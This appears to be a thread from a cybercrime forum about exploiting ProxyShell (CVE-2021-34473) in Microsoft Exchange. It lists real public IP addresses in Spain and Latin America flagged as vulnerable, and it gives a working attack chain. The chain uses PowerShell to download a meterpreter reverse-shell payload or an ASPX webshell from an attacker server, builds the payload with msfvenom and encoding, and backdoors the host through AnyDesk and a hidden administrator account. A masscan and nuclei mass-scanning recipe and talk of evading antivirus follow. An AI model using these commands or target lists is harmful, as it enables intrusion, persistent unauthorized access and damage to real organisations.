[CVE-2021-34473] - Spain

[mwah]

[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://195.77.194.13:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.159.197:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Спасибо Prokhorenco за помощь.

 

[Prokhorenco]

[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://195.77.194.13:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.159.197:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com

Спасибо Prokhorenco за помощь.

If powershell is enabled on the server use [1] and if not then use [2].

If powershell is enabled then use:

powershell.exe Invoke-WebRequest -Uri "http://10.10.10.11:8000/svchost.exe" -OutFile "c:\windows\system32\inetsrv\svchost.exe"

svchost.exe being a meterpreter payload:

msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.11 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o svchost.exe

Or maybe use webshell:

powershell.exe Invoke-WebRequest -Uri "http://10.10.10.11:8000/shell.aspx" -OutFile "c:\inetpub\wwwroot\aspnet_client\kuyghg.aspx"

Port 8000 is simply:

python3 -m http.server

[1] https://github.com/Udyz/proxyshell-auto
[2] https://github.com/Jumbo-WJB/Exchange_SSRF

I find a lot of companies use AnyDesk so i do:
SHELL> tasklist

I see AnyDesk.exe as a running process so i do:

cmd.exe /c echo skalfhgd63iAPE | C:\ProgramData\AnyDesk.exe --set-password
net user oldadmin "skalfhgd63iAPE" /add
net localgroup Administrators oldadmin /ADD
net localgroup "Remote Desktop Users" oldadmin /add
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadmin /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

Now connect.

 

[mrx325]

[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@ test.com
[CVE-2021-34473] [http] [critical] https://185.242.250.120:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://185.60.43.17:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://195.77.194.13:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://2.139.146.147:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://212.8.111.190:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://213.96.47.74:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://217.111.219.18:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://83.56.28.207:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com
[CVE-2021-34473] [http] [critical] https://85.50.159.197:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://85.50.161.81:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test .com

Thanks to Prokhorenco for the help.

can you explain the scan procedure,

 

[mrx325]

If powershell is enabled on the server use [1] and if not then use [2].

If powershell is enabled then use:

powershell.exe Invoke-WebRequest -Uri "http://10.10.10.11:8000/svchost.exe" -OutFile "c:\windows\system32\inetsrv\svchost.exe"

svchost.exe being a meterpreter payload:

msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.11 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o svchost.exe

Or maybe use webshell :

powershell.exe Invoke-WebRequest -Uri "http://10.10.10.11:8000/shell.aspx" -OutFile "c:\inetpub\wwwroot\aspnet_client\kuyghg.aspx"

Port 8000 is simply:

python3 -m http.server

[1] https://github.com/Udyz/proxyshell-auto
[2] https://github.com/Jumbo-WJB/Exchange_SSRF

I find a lot of companies use AnyDesk so i do:
SHELL> tasklist

I see AnyDesk.exe as a running process so i do:

cmd.exe /c echo skalfhgd63iAPE | C:\ProgramData\AnyDesk.exe --set-password
net user oldadmin "skalfhgd63iAPE" /add
net localgroup Administrators oldadmin /ADD
net localgroup "Remote Desktop Users" oldadmin /add
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadmin /t REG_DWORD /d 0 /f
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id

Now connect.

if powershell not enabled is there any way to do payload parameter option to use code execution,

 

[mwah]

can you explain the scan procedure,

masscan -Pn -sS -iL ranges.txt --rate 25000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
sed -i 's/$/:443/' results.txt
nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulnerable.txt

IP2Location LITE

IP Address Geolocation to Country, City, Region, Latitude, Longitude, ZIP Code, ISP, Domain, Time Zone, Area Code, Mobile Data, Usage Type, Elevation and so on.

lite.ip2location.com

IP address block list from PhishKit.

IP address block list from PhishKit. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

Для получения дополнительной информации перейдите сюда.

https://xss.pro/threads/89047/post-620287

 

[antique235]

hi Prokhorenko, thank you for sharing this. there are many vulnerable machines with powershell sessions available indeed, but when I get a session with metasploit payload it is immediately interrupted, presumably by av. do you encrypt the beacon in this case? or do you simply switch to a webshell? thank you for your reply.

 

[Prokhorenco]

hi Prokhorenko, thank you for sharing this. there are many vulnerable machines with powershell sessions available indeed, but when I get a session with metasploit payload it is immediately interrupted, presumably by av. do you encrypt the beacon in this case? or do you simply switch to a webshell? thank you for your reply.

I mainly use sliver. I just use meterpreter as an exmaple.

 

[Prokhorenco]

Latin American (Argentina, Bolivia, Brasil, Chile, Colombia, Costa Rica, Ecuador, El Salvador, Guatemala, Guayana Francesa, Honduras, México, Nicaragua, Panamá, Paraguay, Perú, República Dominicana, Trinidad y Tobago, Uruguay, Venezuela) Proxyshell:

[CVE-2021-34473] [http] [critical] https://138.186.62.206:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://138.186.62.206:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://143.208.134.251:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://143.208.134.251:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://177.137.232.195:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://177.137.232.195:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://179.53.52.48:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://179.53.52.48:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.114.96.60:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.31.67.24:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.31.67.24:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.39.159.69:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.39.159.69:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.113.6.31:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.113.6.31:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.24.14.58:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.24.14.58:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://187.174.160.4:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://187.174.160.4:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.112.8.35:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.112.8.35:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.203.240.176:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.203.240.176:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.203.66.118:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.203.66.118:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.240.194.229:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.240.194.229:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://189.240.215.201:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.106.30.86:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.106.30.86:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.12.54.202:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.12.54.202:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.129.73.158:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.129.73.158:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.153.59.216:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.153.59.216:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.3.68.18:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.7.128.174:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.7.128.174:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.80.28.193:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.80.28.193:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.81.173.179:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.81.173.179:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.0.244.188:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.0.244.188:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.13.234.154:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.13.234.154:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.155.163.42:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.155.163.42:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.21.14.38:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.21.14.38:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.37.143.124:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.37.143.124:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.47.157.53:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.47.157.53:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.48.13.20:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.48.13.20:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.52.130.41:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.52.130.41:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.52.69.201:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.66.85.197:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.116.208.44:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.116.208.44:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.151.197.151:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.151.197.151:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.168.156.62:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.168.156.62:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.184.168.66:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.184.168.66:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.48.211.89:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.48.211.89:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://216.230.137.140:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://216.230.137.140:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://148.244.96.198:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.198.95.166:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.198.95.166:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.204.228.2:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.204.228.2:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.31.67.24:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.31.67.24:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.39.159.69:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://181.39.159.69:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.103.204.250:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.103.204.250:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.113.6.205:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.149.198.239:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.149.198.239:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.24.3.188:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://186.24.3.188:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.119.233.37:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.119.233.37:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.80.28.193:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://190.80.28.193:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.2.170.171:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.2.170.171:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.32.87.102:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.48.48.113:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.48.48.113:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.89.152.82:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.89.152.83:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.89.152.82:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://200.89.152.83:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.151.197.151:443/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
[CVE-2021-34473] [http] [critical] https://201.151.197.151:443/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
